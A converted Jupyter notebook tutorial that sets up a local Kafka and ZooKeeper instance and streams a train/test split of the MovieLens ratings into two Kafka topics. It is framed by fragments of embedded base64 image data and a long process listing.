nxoYsX/Er777rvy2pw5c6xtKM6BtiK5U18Tyo5J2VtOS7YrNunIAs6fPS99JR5+6GHpP9G0cVPpUP7vf/1bag7oU0Gi8OILL4L3GrzYAIweRaLCCFfc3uz9Jg4eOHhPmFuFdPhW95V+GePHjZfmWnRQZ7QqaiN+nPgj6vxfHemTcfLESennQbOojRs2Sv8M1k/zqhyajlyk46k6T0nzqdU/r8bfnvob2rVth993/I7bt27Df7W/jMLVulVrGdUqOjIajKBFcsWoXJ4VPd2BdNhrsic/FRx/jkj8/vE7vHPHdixetEA6jCtO13QY53oYnPxz0T1Gp9r1+06pReA1khBGlOLCrOrE/AyJ+0G/d6VDODUPfI7mVTwmcWjfpiVOnTwpfx/UebmYa0jIdUz+caJ8rknDl3DwwH7M/2mOrJfRsOhfQu0GE59nSF6WR9LBNTr27N4l2zng/X5o2KC+jKQ14YfvEB0VlSfJUddvr2NFnrb6rqi+Rjb5TqnKK+qhvaAqE+XaYRwUJjeNdBSGkOvdd9a7bXMkGjz55JPxypsdHR0NnU6nnBZrn
[... remainder of inline base64 PNG image omitted ...])
###Code
!pip install kafka-python
###Output
Collecting kafka-python
  Downloading https://files.pythonhosted.org/packages/75/68/dcb0db055309f680ab2931a3eeb22d865604b638acf8c914bedf4c1a0c8c/kafka_python-2.0.2-py2.py3-none-any.whl (246kB)
Installing collected packages: kafka-python
Successfully installed kafka-python-2.0.2
###Markdown
Import packages
###Code
import os
from datetime import datetime
import time
import threading
import json
from kafka import KafkaProducer
from kafka.errors import KafkaError
import pandas as pd
from sklearn.model_selection import train_test_split
###Output
_____no_output_____
###Markdown
Download and setup Kafka and Zookeeper instances
For demo purposes, the following instances are set up locally:
- Kafka (Brokers: 127.0.0.1:9092)
- Zookeeper (Node: 127.0.0.1:2181)
###Code
!curl -sSOL https://downloads.apache.org/kafka/2.7.0/kafka_2.13-2.7.0.tgz
!tar -xzf kafka_2.13-2.7.0.tgz
###Output
_____no_output_____
###Markdown
Using the default configurations (provided by Apache Kafka) for spinning up the instances.
###Code
!./kafka_2.13-2.7.0/bin/zookeeper-server-start.sh -daemon ./kafka_2.13-2.7.0/config/zookeeper.properties
!./kafka_2.13-2.7.0/bin/kafka-server-start.sh -daemon ./kafka_2.13-2.7.0/config/server.properties
!echo "Waiting for 10 secs until kafka and zookeeper services are up and running"
!sleep 10
###Output
Waiting for 10 secs until kafka and zookeeper services are up and running
ent/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar org.apache.zookeeper.server.quorum.QuorumPeerMain ./kafka_2.13-2.7.0/config/zookeeper.properties root 1254 1 57 04:17 ? 
00:00:05 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Xmx1G -Xms1G -server -XX:+UseG1GC -XX:MaxGCPauseMillis=20 -XX:InitiatingHeapOccupancyPercent=35 -XX:+ExplicitGCInvokesConcurrent -XX:MaxInlineLevel=15 -Djava.awt.headless=true -Xloggc:/content/kafka_2.13-2.7.0/bin/../logs/kafkaServer-gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCTimeStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=10 -XX:GCLogFileSize=100M -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dkafka.logs.dir=/content/kafka_2.13-2.7.0/bin/../logs -Dlog4j.configuration=file:./kafka_2.13-2.7.0/bin/../config/log4j.properties -cp /content/kafka_2.13-2.7.0/bin/../libs/activation-1.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/aopalliance-repackaged-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/argparse4j-0.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/audience-annotations-0.5.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-cli-1.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/commons-lang3-3.8.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-api-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-basic-auth-extension-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-file-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-json-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-mirror-client-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-runtime-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/connect-transforms-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-api-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-locator-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/hk2-utils-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-core-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-databind-2.10.5.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-dataformat-csv-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-datatype-jdk8-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-base-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-jaxrs-json-provider-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-hk2-2.31.jar:/conten
t/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar kafka.Kafka ./kafka_2.13-2.7.0/config/server.properties root 1329 359 0 04:18 ? 00:00:00 /bin/bash -c ps -ef | grep kafka root 1331 1329 0 04:18 ? 
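###Markdown
Besides grepping the process table, the listener ports can be probed directly. A minimal check, assuming netcat is available in the runtime and that ZooKeeper and the broker use the default ports from the shipped config files (2181 and 9092):
###Code
!nc -vz localhost 2181   # ZooKeeper
!nc -vz localhost 9092   # Kafka broker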
###Markdown
Create the kafka topics with the following specs:
- reco-train: partitions=1, replication-factor=1
- reco-test: partitions=2, replication-factor=1
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 1 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 2 --topic reco-test
###Output
Created topic reco-train.
Created topic reco-test.
###Markdown
Describe the topics for details on their configuration
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-test
###Output
Topic: reco-train  PartitionCount: 1  ReplicationFactor: 1  Configs: segment.bytes=1073741824
    Topic: reco-train  Partition: 0  Leader: 0  Replicas: 0  Isr: 0
Topic: reco-test  PartitionCount: 2  ReplicationFactor: 1  Configs: segment.bytes=1073741824
    Topic: reco-test  Partition: 0  Leader: 0  Replicas: 0  Isr: 0
    Topic: reco-test  Partition: 1  Leader: 0  Replicas: 0  Isr: 0
###Markdown
A replication factor of 1 indicates that the data is not being replicated, which is due to the presence of a single broker in our kafka setup. In production systems the number of brokers can be in the range of hundreds of nodes; that is where fault tolerance using replication comes into the picture. Please refer to the [docs](https://kafka.apache.org/documentation/replication) for more details.
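###Markdown
The same layout can be verified from Python. A minimal sketch, assuming the kafka-python client (the package that also provides the KafkaProducer used further down):
###Code
from kafka import KafkaConsumer

# mirror the kafka-topics.sh --describe calls: list the partition ids per topic
consumer = KafkaConsumer(bootstrap_servers=['127.0.0.1:9092'])
for topic in ('reco-train', 'reco-test'):
    # partitions_for_topic returns the set of partition ids, e.g. {0} or {0, 1}
    print(topic, '->', sorted(consumer.partitions_for_topic(topic)))
consumer.close()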
###Markdown
Movielens Dataset

Kafka, being an event streaming platform, enables data from various sources to be written into it. For instance:
- Web traffic logs
- Astronomical measurements
- IoT sensor data
- Product reviews

and many more. For the purpose of this tutorial, let's download the [Movielens](https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true) dataset and feed the data into kafka manually.
###Code
!wget -O ml_ratings.csv https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
###Output
--2021-06-25 04:18:18--  https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
Resolving github.com (github.com)... 192.30.255.112
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19--  https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19--  https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2179205 (2.1M) [text/plain]
Saving to: ‘ml_ratings.csv’

ml_ratings.csv      100%[===================>]   2.08M  --.-KB/s    in 0.1s

2021-06-25 04:18:20 (20.4 MB/s) - ‘ml_ratings.csv’ saved [2179205/2179205]
###Markdown
Explore the dataset
###Code
movielens_df = pd.read_csv('ml_ratings.csv')
movielens_df.head()

# Number of datapoints and columns
len(movielens_df), len(movielens_df.columns)
###Output
_____no_output_____
###Markdown
Split the dataset
###Code
train_df, test_df = train_test_split(movielens_df, test_size=0.4, shuffle=True)
print("Number of training samples: ", len(train_df))
print("Number of testing samples: ", len(test_df))

x_train_df = train_df.drop(["Rating"], axis=1)
y_train_df = train_df["Rating"]
x_test_df = test_df.drop(["Rating"], axis=1)
y_test_df = test_df["Rating"]

# The labels are set as the kafka message keys so as to store data
# in multiple partitions, enabling efficient data retrieval
# using consumer groups.
x_train = list(filter(None, x_train_df.to_csv(index=False).split("\n")[1:]))
y_train = list(filter(None, y_train_df.to_csv(index=False).split("\n")[1:]))
x_test = list(filter(None, x_test_df.to_csv(index=False).split("\n")[1:]))
y_test = list(filter(None, y_test_df.to_csv(index=False).split("\n")[1:]))

NUM_COLUMNS = len(x_train_df.columns)
len(x_train), len(y_train), len(x_test), len(y_test)
###Output
_____no_output_____
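###Markdown
As a quick sanity check on the serialization above: each x entry is one header-less CSV row and each y entry is the matching rating string (the exact column layout depends on the header of the downloaded ratings file; `filter(None, ...)` only drops the empty string left behind by the trailing newline):
###Code
# first serialized training record and its label
print(x_train[0])
print(y_train[0])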
###Markdown
Store the train and test data in kafka

Storing the data in kafka simulates an environment for continuous remote data retrieval for training and inference purposes.
###Code
def error_callback(exc):
    raise Exception('Error while sending data to kafka: {0}'.format(str(exc)))

def write_to_kafka(topic_name, items):
    count = 0
    producer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092'])
    for message, key in items:
        # the rating travels as the message key, the feature row as the value
        producer.send(topic_name,
                      key=key.encode('utf-8'),
                      value=message.encode('utf-8')).add_errback(error_callback)
        count += 1
    producer.flush()
    print("Wrote {0} messages into topic: {1}".format(count, topic_name))

write_to_kafka("reco-train", zip(x_train, y_train))
write_to_kafka("reco-test", zip(x_test, y_test))

# !/content/kafka_2.13-2.7.0/bin/kafka-console-consumer.sh \
#     --bootstrap-server localhost:9092 \
#     --topic reco-train \
#     --from-beginning
###Output
Processed a total of 60000 messages
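###Markdown
Instead of the console consumer, the written records can also be read back with a short kafka-python sketch (assuming the client is installed and the topic was just populated; the timeout simply stops the iteration once the topic is drained):
###Code
from kafka import KafkaConsumer

consumer = KafkaConsumer(
    'reco-train',
    bootstrap_servers=['127.0.0.1:9092'],
    auto_offset_reset='earliest',   # start from the beginning of the topic
    consumer_timeout_ms=5000,       # stop iterating when no message arrives for 5s
)
for i, record in enumerate(consumer):
    # key holds the rating label, value holds the serialized feature row
    print(record.key.decode('utf-8'), '|', record.value.decode('utf-8'))
    if i >= 4:   # only peek at the first five records
        break
consumer.close()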
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
